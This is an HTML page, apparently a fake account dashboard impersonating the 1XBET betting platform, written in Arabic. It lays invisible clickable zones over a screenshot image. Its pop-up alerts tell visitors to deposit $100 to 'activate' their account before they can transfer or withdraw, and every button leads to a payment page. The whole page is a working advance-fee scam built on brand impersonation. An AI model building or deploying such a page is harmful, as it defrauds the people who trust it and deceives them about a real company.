<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="keywords" content="HTML, CSS, JavaScript">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title> منصة 1XBET للمراهنات الرياضية</title>
<style>
    body {
      margin: 0;
      padding: 0;
      font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
      background-color: #f8f9fa;
    }


    table {
      width: 100%;
      border-collapse: collapse;
      border: 1px solid #dee2e6;
    }

    table th, table td {
      padding: 15px;
      text-align: center;
      border-bottom: 1px solid #dee2e6;
    }

    th {
      background-color: red;
      color: black;
      box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
    }

    td {
      background-color: white;
      border-left: 1px solid #dee2ef;
      background: gray;
      width: 22%;
    }

    h1 {
      color: #343a40;
      text-align: center;
    }

    p {
      color: white;
      text-align: center;
    }
    
#nav{
position:fixed;
bottom:0px;
width: auto;
right: 0px;
left:0px;
height: auto; 
text-align:center;
border-bottom-right-radius:15px;
border-bottom-left-radius:15px;
opacity:0;
}

button{
width:98%; 
height:40px;
font-size: 20px;
padding-bottom: 15px;
border-radius: 10px;
background: white;
margin-top: 2px;
color: white;
border: none;
background: gray;

}
#tab td{
  margin: 5px;
  padding: 0px;
  

}

#regbg{
     display: ;
     position:relative ;
     background-image: url('dashboard.png');
     background-size: cover;
     background-repeat: no-repeat;
     width: 100%;
     height: 100%;
     }

#reg{
   position: absolute; 
   top: 39.5%;
   width: 100%;
}
#bli{
  border: none;
}
#bli td{
  height: 6px;
  width: 10%;
  height: 55px;
  padding: 0;
  opacity: 0;
  border: none;
}

  </style>
</head>
<body dir="rtl">

  <center>
  <div id="regbg">
  <img src="dashboard.png" width="100%">
  <div id="reg"> 
 <table id="bli">
 <tr>
<td onclick="alert('قم بايداع الرصيد 100 دولار لتفعيل الحساب الخاص بك،');"><a href="pay.html" >
<button> تفعيل </button>
 </a>
 </td>
<td onclick="alert('لا يمكنك التحويل قبل تفعيل الحساب،');"><a href="pay.html" >
تحويل</a>
</td>
<td onclick="alert('لا يمكنك السحب قبل تفعيل الحساب،');"><a href="pay.html" >
<button>سحب</button></a>
</td>
<td> <a href="pay.html" >
<button>شحن</button></a></td>

</tr>
 </table>
 <br>
 <br>
 <br>
 <a href="pay.html" > <button style="opacity: 0;" onclick="alert('قم بايداع الرصيد 100 دولار لتفعيل الحساب الخاص بك،');">تفعيل </button></a>
  </div>
  </div>
  
</body>
</html>